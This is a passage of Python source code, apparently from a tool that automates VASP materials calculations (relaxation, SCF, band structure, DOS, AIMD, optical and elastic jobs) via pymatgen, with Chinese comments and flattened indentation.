comment = "run along symmetry lines"
return Kpoints(
comment=comment,
style=Kpoints.supported_modes.Reciprocal,
num_kpts=len(kpts),
kpts=kpts, # type: ignore
kpts_weights=weights,
labels=all_labels,
)
class JobBase():
result_label = []
def __init__(self, structure: Structure, path, job_type, step_type, function, kpoints_type="Gamma", folder=None,
KPOINTS=None,
open_soc=False, dft_u=False, force_coverage=False, mpirun_path="mpirun", vasp_path="vasp_std", cores=1,
**kwargs):
self.test = None
self.structure = structure
self.path: Path = path
self.job_type = job_type
self.step_type = step_type
if folder is None:
self.folder = self.step_type
else:
self.folder = folder
self.function = function
self.open_soc = open_soc
self.dft_u = dft_u
self.kpoints_type = kpoints_type
if KPOINTS is not None:
assert isinstance(KPOINTS, Kpoints), f"自定义KPOINTS必须传入一个Kpoints对象而不是{type(KPOINTS)}"
self.KPOINTS = KPOINTS
self.force_coverage = force_coverage
self.mpirun_path = mpirun_path
self.vasp_path = vasp_path
self.cores = cores
self.cb_energy = 4
self.dpi = 300
self.vb_energy = -4
self.incar_kwargs = {}
for k, v in kwargs.items():
if k.isupper():
# 暂且把全大写的分配到incar 后面有bug再说
self.incar_kwargs[k] = v
else:
setattr(self, k, v)
# 要计算的类型 比如能带
# 要计算的类型的细分步骤 优化 自洽 性质等
verify_path(self.run_dir)
logging.info("当前计算路径:" + self.run_dir.as_posix())
if self.function in ["gw"]:
self.pseudopotential = "gw"
else:
self.pseudopotential = "pbe54"
@cached_property
def run_dir(self) -> Path:
"""
获取vasp 计算路径
:return:
"""
if self.test is not None:
return self.path.joinpath(f"{self.function}/{self.folder}/{self.test}")
return self.path.joinpath(f"{self.function}/{self.folder}")
@cached_property
def incar(self) -> BaseIncar:
"""Incar object."""
incar = BaseIncar.build(self.step_type, self.function)
formula = self.structure.composition.to_pretty_string()
incar["SYSTEM"] = formula + "-" + self.function + "-" + self.step_type
incar.has_magnetic(self.structure)
if "ENCUT" not in self.incar_kwargs:
if setting.get("ENCUTScale"):
incar.auto_encut(self.structure)
if self.step_type != "sr":
if "NSW" in self.incar_kwargs:
self.incar_kwargs.pop("NSW")
incar.update(self.incar_kwargs)
if self.open_soc:
incar["LSORBIT"] = True
if self.dft_u and incar.get("LDAU") is None:
data_u = config.get("U", {})
if not data_u:
logging.warning("\t开启DFT+U必须在配置文件设置U,开启失败!")
return incar
LDAUL = []
LDAUU = []
LDAUJ = []
LDAUL_max = 1
for elem in self.structure.composition.elements:
if elem.name in data_u.keys():
LDAUL.append(str(data_u[elem.name]["LDAUL"]))
LDAUU.append(str(data_u[elem.name]["LDAUU"]))
LDAUJ.append(str(data_u[elem.name]["LDAUJ"]))
if LDAUL_max < data_u[elem.name]["LDAUL"]:
LDAUL_max = data_u[elem.name]["LDAUL"]
else:
LDAUL.append("-1")
LDAUU.append("0")
LDAUJ.append("0")
if all([i == "-1" for i in LDAUL]):
logging.warning("\t在配置文件中没有找到该体系的U值,开启失败!")
return incar
incar["LDAU"] = True
incar["LDAUTYPE"] = 2
incar["LMAXMIX"] = LDAUL_max * 2
incar["LDAUL"] = " ".join(LDAUL)
incar["LDAUU"] = " ".join(LDAUU)
incar["LDAUJ"] = " ".join(LDAUJ)
return incar
@cached_property
def kpoints(self) -> Kpoints:
"""Kpoints object."""
if self.KPOINTS is None:
return BaseKpoints(self.kpoints_type).get_kpoints(self.job_type, self.step_type, self.function,
self.structure)
else:
return self.KPOINTS
@cached_property
def poscar(self) -> Poscar:
"""Poscar object."""
poscar = Poscar(self.structure)
return poscar
@cached_property
def potcar(self) -> Potcar:
potcar = Potcar(symbols=get_pot_symbols(self.structure.species, self.pseudopotential), functional="PBE_54")
return potcar
def check_cover(self):
"""
检查输入文件 避免重复计算 如果不需要重复计算 返回True 否则返回False
:param run_dir:
:return:
"""
if not self.force_coverage and check_in_out_file(self.run_dir):
hash_table = [
hash_file(self.incar, self.run_dir.joinpath("INCAR")),
hash_file(self.kpoints, self.run_dir.joinpath("KPOINTS")),
hash_file(self.poscar, self.run_dir.joinpath("POSCAR")),
hash_file(self.potcar, self.run_dir.joinpath("POTCAR")),
]
if all(hash_table):
try:
if Outcar(os.path.join(self.run_dir, "OUTCAR")).run_stats.get("User time (sec)"):
logging.info("\t已有缓存,如果覆盖运行,设置--force_coverage 或者 -f ")
return True
except:
pass
src_files = ["WAVE*", "CHG*", "*.tmp"]
for src in src_files:
src_file_list = self.run_dir.glob(src)
for file in src_file_list:
Path(file).unlink()
return False
def run(self, timeout=None, lobster=None, remove_wavecar=False):
if self.open_soc:
# 如果打开了soc 并且 scf 或band in
vasp_path = self.vasp_path.with_name("vasp_ncl")
else:
vasp_path = self.vasp_path
vasp_input = VaspInput(self.incar, self.kpoints, self.poscar, self.potcar)
vasp_cmd = [self.mpirun_path, "-np", str(self.cores), vasp_path]
start = datetime.datetime.now()
logging.info("\t开始计算")
vasp_input.write_input(output_dir=self.run_dir)
if lobster:
lobster.write_INCAR(incar_input=self.run_dir.joinpath("INCAR"), incar_output=self.run_dir.joinpath("INCAR"),
poscar_input=self.run_dir.joinpath("POSCAR"))
vasp_cmd = vasp_cmd or SETTINGS.get("PMG_VASP_EXE") # type: ignore[assignment]
if not vasp_cmd:
raise ValueError("No VASP executable specified!")
vasp_cmd = [os.path.expanduser(os.path.expandvars(t)) for t in vasp_cmd]
if not vasp_cmd:
raise RuntimeError("You need to supply vasp_cmd or set the PMG_VASP_EXE in .pmgrc.yaml to run VASP.")
with cd(self.run_dir), open("vasp.out", "w") as f_std, open("vasp.err", "w", buffering=1) as f_err:
subprocess.check_call(vasp_cmd, stdout=f_std, stderr=f_err, timeout=timeout)
logging.info("\t计算完成" + f"\t耗时:{datetime.datetime.now() - start}")
if remove_wavecar:
self.run_dir.joinpath("WAVECAR").unlink()
return self
@abc.abstractmethod
def post_processing(self, result=None):
pass
class StructureRelaxationJob(JobBase):
"""
结构优化的类
"""
def __init__(self, **kwargs):
super().__init__(step_type="sr", **kwargs)
# vasp 有时会让复制contcar 继续优化 这个是控制复制次数
self.run_count = 3
def run(self, **kwargs):
self.final_structure = self.structure
if self.check_cover():
self.post_processing()
return self
try:
super().run(**kwargs)
self.post_processing()
except:
if self.run_count <= 0:
self.post_processing()
return self
error = re.compile(".*please rerun with smaller EDIFF, or copy CONTCAR.*")
with open(self.run_dir.joinpath(f"vasp.out"), "r", encoding="utf8") as f:
for line in f:
if error.match(line):
logging.info("复制CONTCAR继续优化。。。")
self.run_count -= 1
self.structure = Structure.from_file(self.run_dir.joinpath(f"CONTCAR"))
return self.run(**kwargs)
return self
def plot_energy_force(self):
out = Outcar(self.run_dir.joinpath("OUTCAR"))
out.read_pattern({
"e_fr_energy": r"free energy TOTEN\s+=\s+([\d\-\.]+)",
}, postprocess=float)
energy = np.array(out.data["e_fr_energy"])
energy = energy.flatten()
a = out.read_table_pattern(r"TOTAL-FORCE \(eV/Angst\)\n\s*\-+\n", r"\s+".join([r"(\-*[\.\d]+)"] * 6), r"-*\n",
last_one_only=False, postprocess=float)
force = np.array(a)[:, :, 3:]
force = force.reshape((force.shape[0], -1))
max_froce = np.max(force, 1)
result = np.vstack([np.arange(energy.shape[0]), energy, max_froce]).T
fig, axes = plt.subplots(2, 1, sharex=True)
axes1, axes2 = axes
axes1.plot(result[:, 0], result[:, 1], label="energy", color="red")
axes1.set_ylabel("energy(eV)")
axes1.legend()
axes2.plot(result[:, 0], result[:, 2], label="max force", color="green")
axes2.set_ylabel("max force")
axes2.legend()
axes2.set_xlabel("steps")
plt.tight_layout()
plt.savefig(self.run_dir.joinpath("energy_forces.png"), dpi=150)
def post_processing(self, result=None):
if result is None:
result = {}
self.final_structure = Structure.from_file(self.run_dir.joinpath("CONTCAR"))
self.final_structure.to(self.run_dir.parent.joinpath(
f'{self.final_structure.composition.to_pretty_string()}-{self.function}.cif').as_posix())
try:
self.plot_energy_force()
except:
pass
class SCFJob(JobBase):
def __init__(self, step_type="scf", **kwargs):
super().__init__(step_type=step_type, **kwargs)
"""
因为scf后面会用到很多 所以要根据job_type 区分不同场景的
"""
@cached_property
def incar(self):
incar = super().incar
if self.job_type in ["single_point_energy", "phono"]:
if "LWAVE" not in self.incar_kwargs.keys():
incar["LWAVE"] = False
if "LCHARG" not in self.incar_kwargs.keys():
incar["LCHARG"] = False
incar["NSW"] = 0
return incar
@cached_property
def kpoints(self):
"""
因为有的体系自洽是用的连续点模式
重写一下
:return:
"""
if self.function in ["r2scan", "scan", "mbj"]:
return BaseKpoints(self.kpoints_type).get_line_kpoints(self.path, self.function, self.structure)
return super().kpoints
def run(self, **kwargs):
if self.check_cover():
return self
if self.function in ["hse", "gw", "r2scan", "scan", "mbj", "diag"]:
if self.path.joinpath(f"pbe/{self.folder}").exists():
cp_file(self.path.joinpath(f"pbe/{self.folder}/WAVECAR"), self.run_dir)
super().run(**kwargs)
# 有的体系不收敛
vasprun = Vasprun(self.run_dir.joinpath(f"vasprun.xml"), parse_potcar_file=False, parse_dos=False,
parse_eigen=False)
if vasprun.converged:
return self
logging.warning("自洽不收敛,后面计算可能会受到影响!")
return self
# raw_kpoint=self.kpoints
# for i in range(30):
# super().run(**kwargs)
# # 有的体系不收敛 读取电荷密度接着自洽
# vasprun = Vasprun(self.run_dir.joinpath(f"vasprun.xml"), parse_potcar_file=False, parse_dos=False,
# parse_eigen=False)
# if vasprun.converged:
# if raw_kpoint.kpts!=self.kpoints.kpts:
# logging.warning("Gamma点收敛,恢复原k点继续自洽!")
#
# self.kpoints=raw_kpoint
# continue
# return self
# if raw_kpoint.style==KpointsSupportedModes.Monkhorst:
# new=Kpoints.monkhorst_automatic([1,1,1])
# else:
# new = Kpoints.gamma_automatic([1,1,1])
# self.kpoints=new
# self.incar["ICHARG"] = 1
# logging.warning("自洽不收敛,读取电荷密度继续自洽!")
#
# logging.warning("10次自洽不收敛,后面计算可能会受到影响!")
# return self
def post_processing(self, result=None):
if result is None:
result = {}
"""
自洽的返回费米能级
:return:
"""
vasprun = Vasprun(self.run_dir.joinpath(f"vasprun.xml"), parse_potcar_file=False, parse_dos=True)
result[f"efermi_{self.function}"] = vasprun.efermi
result[f"energy_{self.function}"] = vasprun.final_energy
result[f"volume_{self.function}"] = vasprun.final_structure.volume
if self.job_type == "single_point_energy":
name = vasprun.final_structure.composition.to_pretty_string()
config_type = self.structure.properties.get("Config_type", f"scf-{name}")
write_to_xyz(self.run_dir.joinpath("vasprun.xml"), f"./result/{name}{GlobSuffix}.xyz", config_type,
append=True)
write_to_xyz(self.run_dir.joinpath("vasprun.xml"), f"./result/train{GlobSuffix}.xyz", config_type,
append=True)
return result
class WorkFunctionJob(SCFJob):
def __init__(self, **kwargs):
super().__init__(job_type="work_function", folder="work_function", step_type="scf", **kwargs)
@cached_property
def incar(self):
incar = super().incar
incar["LVHAR"] = True
if get_vacuum_axis(self.structure, 10) is not None:
incar["LDIPOL"] = True
incar["IDIPOL"] = get_vacuum_axis(self.structure, 5) + 1
return incar
def post_processing(self, result=None):
result = super().post_processing(result)
loc = Locpot.from_file(self.run_dir.joinpath("LOCPOT"))
fig = plt.figure()
z_data = loc.get_average_along_axis(2)
z_index = loc.get_axis_grid(2)
plt.plot(z_index, z_data)
plt.xlabel("Position (A)")
plt.ylabel("Potential (eV)")
plt.savefig(self.run_dir.joinpath(f"work_function_{self.function}.png"), dpi=self.dpi)
np.savetxt(self.run_dir.joinpath(f"work_function_{self.function}.csv"), np.vstack([z_index, z_data]).T)
vacuum_level = np.max(z_data)
vasprun = Vasprun(self.run_dir.joinpath(f"vasprun.xml"), parse_potcar_file=False, parse_dos=True)
result[f"vacuum_level_{self.function}"] = vacuum_level
result[f"work_function_{self.function}"] = vacuum_level - vasprun.efermi
return result
class LobsterJob(JobBase):
def __init__(self, **kwargs):
super().__init__(step_type="scf", folder="cohp", **kwargs)
def build_lobster(self, basis_setting):
lobsterin_dict = {"basisSet": "pbeVaspFit2015", "COHPstartEnergy": -10.0, "COHPendEnergy": 10.0,
"cohpGenerator": "from 0.1 to 6.0 orbitalwise", "saveProjectionToFile": True}
# every interaction with a distance of 6.0 is checked
# the projection is saved
if self.incar["ISMEAR"] == 0:
lobsterin_dict["gaussianSmearingWidth"] = self.incar["SIGMA"]
lobsterin_dict["skipdos"] = True
lobsterin_dict["skipcoop"] = True
lobsterin_dict["skipPopulationAnalysis"] = True
lobsterin_dict["skipGrossPopulation"] = True
# lobster-4.1.0
lobsterin_dict["skipcobi"] = True
lobsterin_dict["skipMadelungEnergy"] = True
basis = [f"{key} {value}" for key, value in basis_setting.items()]
lobsterin_dict["basisfunctions"] = basis
self.lobster = Lobsterin(lobsterin_dict)
self.lobster.write_lobsterin(self.run_dir.joinpath("lobsterin").as_posix())
return self.lobster
def run_lobster(self):
logging.info("\t开始运行lobster")
with cd(self.run_dir), open("lobster.out", "w") as f_std, open("lobster.err", "w", buffering=1) as f_err:
subprocess.check_call(["lobster"], stdout=f_std, stderr=f_err, )
logging.info("\tlobster分析结束")
def run(self, **kwargs):
if self.check_cover():
return self
return super().run(lobster=self.lobster, **kwargs)
def extract_icohp(self):
icohp = Icohplist(filename=self.run_dir.joinpath("ICOHPLIST.lobster").as_posix())
icohps = icohp.icohpcollection
elements_with_numbers = list(set(icohps._list_atom1 + icohps._list_atom2))
def extract_number(element):
match = re.search(r'(\d+)$', element)
return int(match.group(1)) if match else None
numbers = [extract_number(elem) for elem in elements_with_numbers]
sorted_pairs = sorted(zip(elements_with_numbers, numbers), key=lambda x: x[1])
sorted_elements_with_numbers = [pair[0] for pair in sorted_pairs]
frame = pd.DataFrame(index=sorted_elements_with_numbers, columns=sorted_elements_with_numbers)
for _icohp in icohps._icohplist.values():
if _icohp._translation != [0, 0, 0]:
continue
frame.loc[_icohp._atom1, _icohp._atom2] = _icohp._icohp[Spin.up]
if Spin.down in _icohp._icohp.keys():
frame.loc[_icohp._atom2, _icohp._atom1] = _icohp._icohp[Spin.down]
frame.to_csv(self.run_dir.joinpath("icohp.csv"))
def post_processing(self, result=None):
if result is None:
result = {}
lobsterout = Lobsterout(self.run_dir.joinpath("lobsterout").as_posix())
result["basis"] = lobsterout.basis_functions
result["charge_spilling"] = lobsterout.charge_spilling
result["best_path"] = self.run_dir.as_posix()
self.extract_icohp()
return result
class DosJob(JobBase):
def __init__(self, **kwargs):
super().__init__(job_type="band_structure", step_type="dos", **kwargs)
@cached_property
def incar(self):
incar = super().incar
if self.function == "mbj":
outcar = Outcar(self.path.joinpath("mbj/scf/OUTCAR").as_posix())
outcar.read_pattern({"CMBJ": r'CMBJ = (.*)'})
if outcar.data["CMBJ"]:
incar["CMBJ"] = outcar.data["CMBJ"][-1][0]
return incar
def run(self, **kwargs):
if self.check_cover():
return self
cp_file(self.path.joinpath(f"{self.function}/scf/CHGCAR"), self.run_dir)
cp_file(self.path.joinpath(f"{self.function}/scf/CHG"), self.run_dir)
cp_file(self.path.joinpath(f"{self.function}/scf/WAVECAR"), self.run_dir)
return super().run(**kwargs)
def write_dos_file(self, path, data, headers):
np.savetxt(self.run_dir.joinpath(path), data, delimiter=" ", fmt="%10.6f", comments="",
header=" ".join(headers))
def export_tdos(self, tdos, dos):
verify_path(self.run_dir.joinpath("data"))
energy = dos.energies - dos.efermi
self.write_dos_file("data/total-up.dat",
np.vstack([energy, tdos.densities[Spin.up]]).T,
headers=["energy(eV)", "Density"])
if Spin.down in tdos.densities:
self.write_dos_file("data/total-dw.dat",
np.vstack([energy, -tdos.densities[Spin.down]]).T,
headers=["energy(eV)", "Density"])
# 先按元素导出所有元素的总的
elem_dos = dos.get_element_dos()
for elem, e_dos in elem_dos.items():
self.write_dos_file(f"data/total-up-{elem.name}.dat",
np.vstack([energy, e_dos.densities[Spin.up]]).T,
headers=["energy(eV)", "Density"])
if Spin.down in e_dos.densities:
self.write_dos_file(f"data/total-dw-{elem.name}.dat",
np.vstack([energy, -e_dos.densities[Spin.down]]).T,
headers=["energy(eV)", "Density"])
def export_pdos(self, dos: CompleteDos):
verify_path(self.run_dir.joinpath("data/pdos"))
energy = dos.energies - dos.efermi
ispin = self.incar.get("ISPIN") == 2
el_dos = {}
index_map = {}
for site, atom_dos in dos.pdos.items():
element = site.specie.name
if element not in el_dos:
index_map[element] = 1
el_dos[element] = {Spin.up: np.zeros((energy.shape[0], len(atom_dos)), dtype=np.float64)}
if ispin:
el_dos[element][Spin.down] = el_dos[element][Spin.up].copy()
site_single = {Spin.up: np.zeros_like(el_dos[element][Spin.up])}
if ispin:
site_single[Spin.down] = site_single[Spin.up].copy()
for orb, pdos in atom_dos.items():
for spin, ppdos in pdos.items():
site_single[spin][:, orb.value] += ppdos
headers = ["energy(eV)"] + [Orbital(i).name for i in range(len(atom_dos))] + ["sum"]
self.write_dos_file(
f"data/pdos/site-up-{element}{index_map[element]}.dat",
np.hstack(
[energy.reshape(-1, 1), site_single[Spin.up], site_single[Spin.up].sum(axis=1).reshape(-1, 1)]),
headers
)
if ispin:
self.write_dos_file(
f"data/pdos/site-dw-{element}{index_map[element]}.dat",
np.hstack([energy.reshape(-1, 1), -site_single[Spin.down],
-site_single[Spin.down].sum(axis=1).reshape(-1, 1)]),
headers
)
el_dos[element][Spin.up] += site_single[Spin.up]
if ispin:
el_dos[element][Spin.down] += site_single[Spin.down]
index_map[element] += 1
for elem, total_dos in el_dos.items():
for spin, spin_dos in total_dos.items():
headers = ["energy(eV)"] + [Orbital(i).name for i in range(spin_dos.shape[-1])] + ["sum"]
self.write_dos_file(
f"data/pdos/element-{'up' if spin == Spin.up else 'dw'}-{elem}.dat",
np.hstack([energy.reshape(-1, 1), spin.value * spin_dos,
spin.value * spin_dos.sum(axis=1).reshape(-1, 1)]),
headers
)
def post_processing(self, result=None):
if result is None:
result = {}
vasprun = Vasprun(self.run_dir.joinpath("vasprun.xml"), parse_potcar_file=False )
dos = vasprun.complete_dos
result[f"dos_efermi_{self.function}"] = dos.efermi
result[f"dos_vbm_{self.function}"] = dos.get_cbm_vbm()[1]
result[f"dos_cbm_{self.function}"] = dos.get_cbm_vbm()[0]
result[f"dos_gap_{self.function}"] = dos.get_gap()
self.export_tdos(vasprun.tdos, dos)
if setting.get("ExportProjection", True):
self.export_pdos(dos)
plotter = DosPlotter()
# 添加各种元素的DOS数据
for element, element_dos in dos.get_element_dos().items():
if element_dos is not None:
plotter.add_dos(str(element), element_dos)
plot = plotter.get_plot(xlim=(self.vb_energy, self.cb_energy))
# 将x轴的标签刻度只显示整数 注释掉会显示0.5这种
# plot.xaxis.set_major_locator(MaxNLocator(integer=True))
plt.tight_layout()
plt.savefig(self.run_dir.joinpath("dos.png"), dpi=self.dpi)
return result
class BandStructureJob(JobBase):
def __init__(self, **kwargs):
super().__init__(job_type="band_structure", step_type="band", **kwargs)
@cached_property
def incar(self):
incar = super().incar
if self.function == "mbj":
outcar = Outcar(self.path.joinpath("mbj/scf/OUTCAR").as_posix())
outcar.read_pattern({"CMBJ": r'CMBJ = (.*)'})
if outcar.data["CMBJ"]:
incar["CMBJ"] = outcar.data["CMBJ"][-1][0]
return incar
@cached_property
def kpoints(self):
"""
因为有的体系自洽是用的连续点模式
重写一下
:return:
"""
if self.function in ["gw", "g0w0"]:
return super().kpoints
return BaseKpoints(self.kpoints_type).get_line_kpoints(self.path, self.function, self.structure)
def run(self, **kwargs):
if self.check_cover():
return self
cp_file(self.path.joinpath(f"{self.function}/scf/CHGCAR"), self.run_dir)
cp_file(self.path.joinpath(f"{self.function}/scf/CHG"), self.run_dir)
cp_file(self.path.joinpath(f"{self.function}/scf/WAVECAR"), self.run_dir)
return super().run(**kwargs)
def calculate_effective_mass(self, distance, energy, kpoint_index):
window_size = 5
# 计算窗口的一半大小
half_window = window_size // 2
# 确定窗口的左边界和右边界
left_boundary = max(0, kpoint_index - half_window)
right_boundary = min(len(energy), kpoint_index + half_window + (window_size % 2)) # 保证窗口大小为奇数
# 如果窗口左边界在数组开头,调整右边界
if left_boundary == 0:
right_boundary = min(len(energy), right_boundary + (half_window - kpoint_index))
# 如果窗口右边界在数组结尾,调整左边界
if right_boundary == len(energy):
right_boundary = min(len(energy), kpoint_index + half_window + (window_size % 2))
left_boundary = max(0, right_boundary - window_size)
energy *= 0.036749
distance *= 0.5291772108
coefficients = np.polyfit(distance[left_boundary:right_boundary], energy[left_boundary:right_boundary], 2)
return 0.5 / coefficients[0]
def write_projected_dat(self,filename,distance,energy,projected):
_data = [energy]
headers = [u"distance(1/A)", u"energy(eV)"]
for i in range(projected.shape[-1]):
_data.append(projected[:, :, i])
headers.append(f"projected {Orbital(i).name}")
headers.append("sum")
_data.append(projected.sum(axis=2))
array_to_dat(self.run_dir.joinpath(filename),
np.array(distance), *_data,
headers=headers)
def export_projected_data(self,bs):
verify_path(self.run_dir.joinpath("data/projected"))
for spin, spin_projection in bs.projections.items():
element_result = {}
element_index={}
for elem in self.structure.composition.elements:
element_index[elem.name]=1
element_result[elem.name] = np.zeros((spin_projection.shape[0], spin_projection.shape[1], spin_projection.shape[2]), dtype=np.float64)
for site_index in range(len(self.structure)):
site=self.structure[site_index].specie.name
site_array=spin_projection[:,:, :, site_index]
element_result[site]+=site_array
self.write_projected_dat(
f"data/projected/site-{'up' if spin == Spin.up else 'dw'}-{site}{element_index[site]}.dat",
bs.distance,
bs.bands[spin]-bs.efermi,
site_array
)
element_index[site]+=1
for elem ,value in element_result.items():
self.write_projected_dat(
f"data/projected/element-{'up' if spin == Spin.up else 'dw'}-{elem}.dat",
bs.distance,
bs.bands[spin] - bs.efermi,
value
)
def export_band_data(self, bs):
spin_map = {Spin.up: "up", Spin.down: "dw"}
for spin, bands in bs.bands.items():
spin_str = spin_map[spin]
array_to_dat(self.run_dir.joinpath(f"data/band-{spin_str}.dat"), np.array(bs.distance), bands - bs.efermi,
headers=[u"distance(1/A)", u"energy(eV)"])
def get_effective_mass(self, bs):
me = 0
mh = 0
try:
if not bs.is_metal():
vbm = bs.get_vbm()
cbm = bs.get_cbm()
spin = list(cbm["band_index"].keys())[0]
index = list(cbm["band_index"].values())[0][0]
me = self.calculate_effective_mass(np.array(bs.distance),
bs.bands[spin][index].copy(),
cbm["kpoint_index"][0])
spin = list(vbm["band_index"].keys())[0]
index = list(vbm["band_index"].values())[0][0]
mh = self.calculate_effective_mass(np.array(bs.distance),
bs.bands[spin][index].copy(),
vbm["kpoint_index"][0]
)
except:
pass
return me, mh
def post_processing(self, result=None):
if result is None:
result = {}
if self.function != "pbe":
force_hybrid_mode = True
else:
force_hybrid_mode = False
if self.kpoints.style in [Kpoints.supported_modes.Line_mode, Kpoints.supported_modes.Reciprocal]:
line_mode = True
else:
line_mode = False
vasprun = BSVasprun(self.run_dir.joinpath("vasprun.xml").as_posix(),
parse_projected_eigen=setting.get("ExportProjection", True)
)
bs = vasprun.get_band_structure(line_mode=line_mode, force_hybrid_mode=force_hybrid_mode)
band_gap = bs.get_band_gap()
vbm = bs.get_vbm()
cbm = bs.get_cbm()
result[f"direct_{self.function}"] = band_gap['direct']
result[f"band_gap_{self.function}"] = band_gap['energy']
result[f"vbm_{self.function}"] = vbm["energy"]
result[f"cbm_{self.function}"] = cbm["energy"]
result[f"efermi_{self.function}"] = bs.efermi
result[f"m_e_{self.function}"], result[f"m_h_{self.function}"] = self.get_effective_mass(bs)
if not line_mode:
return result
if not self.run_dir.joinpath("data").exists():
self.run_dir.joinpath("data").mkdir()
self.export_band_data(bs)
if bs.projections:
self.export_projected_data(bs)
plotter = BSPlotter(bs)
plot = plotter.get_plot(ylim=(self.vb_energy, self.cb_energy), vbm_cbm_marker=True)
plt.savefig(self.run_dir.joinpath(f"band.png"), dpi=self.dpi)
with open(self.run_dir.joinpath(f"data/band_lables.txt"), "w", encoding="utf8") as f:
f.write("distance\tlable\n")
distance = plotter.get_ticks()["distance"]
label = plotter.get_ticks()["label"]
for i in range(len(label)):
f.write(f"{round(distance[i], 6)}\t{label[i]}\n")
return result
class AimdJob(JobBase):
def __init__(self, TEBEG=300, TEEND=300, NSW=3000, **kwargs):
if "ML_LMLFF" in kwargs and kwargs["ML_LMLFF"]:
folder = f"aimd-ml({TEBEG}-{TEEND}k)@{NSW}"
else:
folder = f"aimd({TEBEG}-{TEEND}k)@{NSW}"
super().__init__(step_type="aimd", TEBEG=TEBEG, TEEND=TEEND, NSW=NSW, folder=folder, **kwargs)
def run(self, **kwargs):
if self.check_cover():
return self
return super().run(**kwargs)
def plot_aimd(self, vasprun):
name = vasprun.final_structure.composition.to_pretty_string()
energies = [step["e_0_energy"] for step in vasprun.ionic_steps]
steps = list(range(1, len(energies) + 1))
plt.figure(figsize=(3.5, 2.625))
plt.plot(steps, energies, label=name)
plt.ylabel("E0 Energy(eV)")
plt.xlabel("Time(fs)")
plt.legend()
plt.tight_layout()
plt.savefig(self.run_dir.joinpath("aimd.png"), dpi=self.dpi)
def get_ionic_steps_index(self, vasprun: Vasprun):
index = 0
result = []
ionic_steps = vasprun.ionic_steps
nionic_steps = vasprun.nionic_steps
for md_i, md in enumerate(vasprun.md_data):
if md["energy"]["e_0_energy"] == ionic_steps[index]["e_0_energy"]:
result.append(md_i + 1)
index += 1
if index == nionic_steps:
break
return result
def plot_aimd_ml(self, vasprun):
name = vasprun.final_structure.composition.to_pretty_string()
energies = [step["energy"]["e_0_energy"] for step in vasprun.md_data]
steps = list(range(1, len(energies) + 1))
plt.figure()
plt.plot(steps, energies, label=name)
energies = [step["e_0_energy"] for step in vasprun.ionic_steps]
index = self.get_ionic_steps_index(vasprun)
if len(index) == len(energies):
plt.scatter(index, energies, label="Aimd", s=4, c="red")
plt.ylabel("E0 Energy(eV)")
plt.xlabel("Time(fs)")
plt.legend()
plt.tight_layout()
plt.savefig(self.run_dir.joinpath("aimd-ml.png"), dpi=self.dpi)
def post_processing(self, result=None):
if result is None:
result = {}
"""
:return:
"""
vasprun = Vasprun(self.run_dir.joinpath(f"vasprun.xml"), parse_potcar_file=False, parse_dos=False)
if self.incar.get("ML_LMLFF"):
# 机器学习
self.plot_aimd_ml(vasprun)
else:
self.plot_aimd(vasprun)
config_type = f"{self.folder}-({self.path.name})-"
write_to_xyz(self.run_dir.joinpath("vasprun.xml"), self.run_dir.joinpath("aimd.xyz"), config_type, append=False)
return result
class StaticDielectricJob(JobBase):
def __init__(self, **kwargs):
super().__init__(job_type="optic_dielectric", step_type="dielectric", **kwargs)
def run(self, **kwargs):
if self.check_cover():
return self
cp_file(self.path.joinpath(f"{self.function}/scf/WAVECAR"), self.run_dir)
return super().run(**kwargs)
def post_processing(self, result=None):
if result is None:
result = {}
outcar = Outcar(self.run_dir.joinpath("OUTCAR").as_posix())
result[f"dielectric_electron_{self.function}"] = outcar.dielectric_tensor[0][0]
if self.incar.get("IBRION") == 8:
result[f"dielectric_ionic_{self.function}"] = outcar.dielectric_ionic_tensor[0][0]
else:
result[f"dielectric_ionic_{self.function}"] = 0
return result
class ElasticJob(JobBase):
def __init__(self, **kwargs):
super().__init__(job_type="elastic", step_type="elastic", folder="elastic", **kwargs)
# @cached_property
# def incar(self):
# incar =super().incar
#
#
#
# return incar
def run(self, **kwargs):
if self.check_cover():
return self
# cp_file(self.path.joinpath(f"{self.function}/scf/WAVECAR"), self.run_dir)
# cp_file(self.path.joinpath(f"{self.function}/scf/CHGCAR"), self.run_dir)
return super().run(**kwargs)
def post_processing(self, result=None):
if result is None:
result = {}
outcar = Outcar(self.run_dir.joinpath("OUTCAR").as_posix())
outcar.read_elastic_tensor()
elastic_tensor = outcar.data["elastic_tensor"]
result["elastic_tensor"] = elastic_tensor
return result
class OpticJob(JobBase):
result_label = ["dielectric_real", "dielectric_imag",
"optic_direct_band_gap", "optic_indirect_band_gap",
"mean", "max", "area"
]
def __init__(self, **kwargs):
super().__init__(job_type="optic_dielectric", step_type="optic", **kwargs)
@cached_property
def incar(self):
incar = super().incar
if self.function in ["bse"]:
incar["NBANDS"] = Wavecar(self.path.joinpath(f"gw/band/WAVECAR").as_posix()).nb
else:
eig = Eigenval(self.path.joinpath(f"{self.function}/scf/EIGENVAL").as_posix())
incar["NBANDS"] = eig.nbands * 2
return incar
def run(self, **kwargs):
if self.check_cover():
return self
cp_file(self.path.joinpath(f"{self.function}/scf/WAVECAR"), self.run_dir)
return super().run(**kwargs)
def post_processing(self, result=None):
if result is None:
result = {}
vasp = Vasprun(self.run_dir.joinpath(f"vasprun.xml"), parse_potcar_file=False)
result[f"dielectric_real_{self.function}"] = vasp.dielectric[1][0][0]
result[f"dielectric_imag_{self.function}"] = vasp.dielectric[2][0][0]
new_en, new_abs = slme.absorption_coefficient(vasp.dielectric)
plt.clf()
plt.xlabel("Photon energy (eV)")
plt.ylabel("Absorption ($cm^{-1}$)")
plt.plot(new_en, new_abs)
plt.xlim((0, 5))
# plt.tight_layout()
plt.savefig(self.run_dir.joinpath(f"absorption_coefficient.png"), dpi=self.dpi)
info = {}
for i, en in enumerate(new_en):
if "start" not in info.keys():
if en >= 1.59:
info["start"] = (i, en)
if en >= 3.26:
info["end"] = (i, en)
break
_max = round(np.max(new_abs[info["start"][0]:info["end"][0]]) / 1e6, 5)
mean = round(np.mean(new_abs[info["start"][0]:info["end"][0]]) / 1e6, 5)
result[f"mean_{self.function}"] = mean
result[f"max_{self.function}"] = _max
result[f"area_{self.function}"] = round(
np.trapz(new_abs[info["start"][0]:info["end"][0]], new_en[info["start"][0]:info["end"][0]]) / 1e6, 5)
plt.clf()
plt.plot(vasp.dielectric[0], vasp.dielectric[1], label="real")
plt.plot(vasp.dielectric[0], vasp.dielectric[2], label="imag")
plt.ylim(-40, 40)
plt.legend()
plt.savefig(self.run_dir.joinpath(f"dielectric-function.png"), dpi=self.dpi)
plt.clf()
return result
class BaderJob(SCFJob):
def __init__(self, **kwargs):
